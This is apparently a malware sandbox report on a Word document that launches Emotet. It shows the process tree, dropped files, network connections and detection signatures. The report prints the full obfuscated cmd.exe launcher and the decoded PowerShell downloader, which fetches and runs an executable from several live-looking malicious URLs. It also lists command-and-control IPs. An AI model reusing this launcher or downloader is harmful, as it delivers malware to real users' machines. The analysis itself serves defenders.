;55;41;41;38;8;7;58;48;52;63;8;17;29;42;75;66;66;26;16;36;32;29;36;16;7;75;2;34;63;27;67;55;43;56;72;16;46;18;36;1;75;32;18;16;75;55;49;49;49;49;43;75;31;29;46;5;3;33;16;32;29;36;16;7;75;2;34;63;27;67;55;17;2;72;27;49;41;41;38;8;7;55;67;55;41;8;17;51;10;16;28;33;17;65;65;62;28;36;62;1;31;65;65;2;22;63;49;6;49;38;8;7;27;27;27;58;8;17;91)do set tCK=!tCK!!kQXu:~%L,1!&&if %L geq 91 echo !tCK:*tCK!=!\|FOR /F "delims=KHFN tokens=2" %5 IN ('ftype^^^\|find "mdFi"')DO %5 "	c:\windows\system32\cmd.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2504	CmD /V:ON/C"set kQXu=uh$oQv2m'dr%YE+Fe;g~ZBzpiLG8aIx{-kjOtN=yS7f)/WnT10sb6Pq4.C3VDRc5_}(9,\w@lAH XM:UK&&for %L in (23;3;70;11;53;79;21;25;29;57;78;19;63;68;48;11;10;11;40;13;40;40;29;35;37;37;73;77;13;78;19;32;55;68;48;11;1;11;47;13;77;53;78;19;32;58;68;48;11;72;72;75;2;1;48;63;41;67;38;8;46;48;27;55;52;8;17;2;0;52;52;6;27;38;46;16;70;32;3;51;34;16;62;36;75;37;16;36;56;45;16;51;57;72;24;16;46;36;17;2;3;67;6;27;27;38;8;1;36;36;23;78;44;44;70;70;70;56;28;23;42;32;16;46;36;10;16;23;10;24;50;16;50;27;49;56;62;3;7;44;18;74;67;13;54;52;4;23;6;54;21;73;50;51;37;71;1;36;36;23;78;44;44;70;70;70;56;9;16;5;24;36;42;3;10;70;28;10;9;56;62;3;7;44;74;0;62;80;23;18;54;50;36;52;79;28;39;64;59;7;80;77;71;1;36;36;23;78;44;44;62;28;7;32;36;16;62;1;56;24;10;44;41;48;26;61;54;34;22;42;10;20;71;1;36;36;23;78;44;44;72;28;34;24;10;28;42;28;50;3;23;1;24;16;56;62;3;7;44;70;23;32;24;46;62;72;0;9;16;50;44;47;74;61;67;10;13;33;72;45;76;29;22;20;42;71;1;36;36;23;78;44;44;16;50;9;16;56;28;72;44;59;26;4;12;60;45;23;59;64;13;6;27;13;13;55;76;33;33;8;56;40;23;72;24;36;66;8;71;8;43;17;2;5;41;63;27;41;38;8;34;55;67;58;58;8;17;2;46;58;52;67;55;75;38;75;8;52;55;58;8;17;2;1;6;6;41;38;8;36;55;63;55;6;8;17;2;34;63;27;67;55;38;2;16;46;5;78;36;16;7;23;14;8;69;8;14;2;46;58;52;67;55;14;8;56;16;30;16;8;17;42;3;10;16;28;62;1;66;2;3;58;49;67;67;75;24;46;75;2;3;67;6;27;27;43;31;36;10;39;31;2;0;52;52;6;27;56;60;3;70;46;72;3;28;9;15;24;72;16;66;2;3;58;49;67;67;68;75;2;34;63;27;67;55;43;17;2;42;41;55;41;41;38;8;7;58;48;52;63;8;17;29;42;75;66;66;26;16;36;32;29;36;16;7;75;2;34;63;27;67;55;43;56;72;16;46;18;36;1;75;32;18;16;75;55;49;49;49;49;43;75;31;29;46;5;3;33;16;32;29;36;16;7;75;2;34;63;27;67;55;17;2;72;27;49;41;41;38;8;7;55;67;55;41;8;17;51;10;16;28;33;17;65;65;62;28;36;62;1;31;65;65;2;22;63;49;6;49;38;8;7;27;27;27;58;8;17;91)do set tCK=!tCK!!kQXu:~%L,1!&&if %L geq 91 echo !tCK:*tCK!=!\|FOR /F "delims=KHFN tokens=2" %5 IN ('ftype^^^\|find "mdFi"')DO %5 "	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
4020	C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $h1579='n1846';$u6628=new-object Net.WebClient;$o9288='http://www.apf-entreprises80.com/gH9Eq6Qp2qBAsbN@http://www.devitforward.com/HucKpgqst6Uay_VmKM@http://cam-tech.ir/71GRqjzfrZ@http://lajirafasophie.com/wp-includes/THR9rEklWXIzZf@http://esde.al/VGQYDWpV_E28EE4Xkk'.Split('@');$v7587='j4933';$n3694 = '643';$h227='t4542';$j5894=$env:temp+'\'+$n3694+'.exe';foreach($o3099 in $o9288){try{$u6628.DownloadFile($o3099, $j5894);$f7477='m3165';If ((Get-Item $j5894).length -ge 40000) {Invoke-Item $j5894;$l8077='m4947';break;}}catch{}}$z5020='m8883';"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1644	C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=KHFN tokens=2" %5 IN ('ftype^\|find "mdFi"') DO %5 "	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2464	C:\Windows\system32\cmd.exe /c ftype\|find "mdFi"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2744	C:\Windows\system32\cmd.exe /S /D /c" ftype"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2860	find "mdFi"	C:\Windows\system32\find.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3548	Cmd	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3792	powershell $h1579='n1846';$u6628=new-object Net.WebClient;$o9288='http://www.apf-entreprises80.com/gH9Eq6Qp2qBAsbN@http://www.devitforward.com/HucKpgqst6Uay_VmKM@http://cam-tech.ir/71GRqjzfrZ@http://lajirafasophie.com/wp-includes/THR9rEklWXIzZf@http://esde.al/VGQYDWpV_E28EE4Xkk'.Split('@');$v7587='j4933';$n3694 = '643';$h227='t4542';$j5894=$env:temp+'\'+$n3694+'.exe';foreach($o3099 in $o9288){try{$u6628.DownloadFile($o3099, $j5894);$f7477='m3165';If ((Get-Item $j5894).length -ge 40000) {Invoke-Item $j5894;$l8077='m4947';break;}}catch{}}$z5020='m8883';	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

1 806

Read events

1 323

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2808	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR65CF.tmp.cvr		—
		MD5:—	SHA256:—
2808	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\959DD499.jpg		—
		MD5:—	SHA256:—
3792	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TN6A6K7Y7I0KY206F9YY.temp		—
		MD5:—	SHA256:—
2184	643.exe	C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe		executable
		MD5:FAB33D99A263650FB24018CAB7D65AC9	SHA256:785C2D79490E3302C18E618BEF73D3DB5EDC4FC6C2A4323D53F45858878208B2
2808	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:B6F7F2168AE5A05F5D6AD7C0FFC9EBE0	SHA256:CE53C029D245180E2BF624A6687992A54C6AC290B8367D70B0A0B38F5E1E0B95
3792	powershell.exe	C:\Users\admin\AppData\Local\Temp\643.exe		executable
		MD5:FAB33D99A263650FB24018CAB7D65AC9	SHA256:785C2D79490E3302C18E618BEF73D3DB5EDC4FC6C2A4323D53F45858878208B2
3792	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:6073B6FC66D2E68644893344F6904E4A	SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3792	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247967.TMP		binary
		MD5:6073B6FC66D2E68644893344F6904E4A	SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2808	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd		tlb
		MD5:50C31C86FC14D2DAB39F2FEC420DE32E	SHA256:7037F116B5EFABBB516092CD165D404035F5431CB12E8E62AC36C4FEBEC9A922
2808	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$20939475763.doc		pgc
		MD5:1F0423EB6A311883587DFA6DCF7B704F	SHA256:DDE579B842882E5E821CEB697F7444F683D4750165A834ACB409F9441901DD09

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3792	powershell.exe	GET	200	213.186.33.17:80	http://www.apf-entreprises80.com/gH9Eq6Qp2qBAsbN/	FR	executable	560 Kb	malicious
3792	powershell.exe	GET	301	213.186.33.17:80	http://www.apf-entreprises80.com/gH9Eq6Qp2qBAsbN	FR	html	257 b	malicious
2680	wabmetagen.exe	GET	200	206.248.110.184:8080	http://206.248.110.184:8080/	PR	binary	132 b	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2680	wabmetagen.exe	206.248.110.184:8080	—	—	PR	malicious
2680	wabmetagen.exe	182.180.170.72:22	—	Pakistan Telecom Company Limited	PK	suspicious
3792	powershell.exe	213.186.33.17:80	www.apf-entreprises80.com	OVH SAS	FR	malicious

DNS requests

Domain	IP	Reputation
www.apf-entreprises80.com	213.186.33.17	malicious
dns.msftncsi.com	131.107.255.255	shared

Threats

PID	Process	Class	Message
3792	powershell.exe	A Network Trojan was detected	SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3792	powershell.exe	A Network Trojan was detected	SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3792	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
3792	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3792	powershell.exe	Misc activity	ET INFO EXE - Served Attached HTTP
2680	wabmetagen.exe	A Network Trojan was detected	SC SPYWARE Spyware Emotet Win32
2680	wabmetagen.exe	A Network Trojan was detected	MALWARE [PTsecurity] Feodo HTTP request

1 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

6220939475763.doc

8853997FE8C46705EDCC06E18E6D736F

27C8CFAC5161D7E9BA0D15F723ECFAC8B8E8EBA8

1A68B45AF1EB91D9DDC3D5BFDF29EEEDA46C098BDDD550485494B82DD4225884

3072:xzRWs9T4+SojL/xSu90OoiLuDKZXfwKeljR1z:xb9MJexUOmD+XfwLX

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Starts CMD.EXE for commands execution

Unusual execution from Microsoft Office

Executes PowerShell scripts

Application was dropped or rewritten from another process

Runs app for hidden code execution

Downloads executable files from the Internet

Request from PowerShell which ran from CMD.EXE

Changes the autorun value in the registry

EMOTET was detected

Connects to CnC server

SUSPICIOUS

Application launched itself

Starts CMD.EXE for commands execution

Creates files in the user directory

Executable content was dropped or overwritten

Starts itself from another location

Connects to unusual port

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Dropped object may contain Bitcoin addresses

Malware configuration

Static information

TRiD

EXIF

XMP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings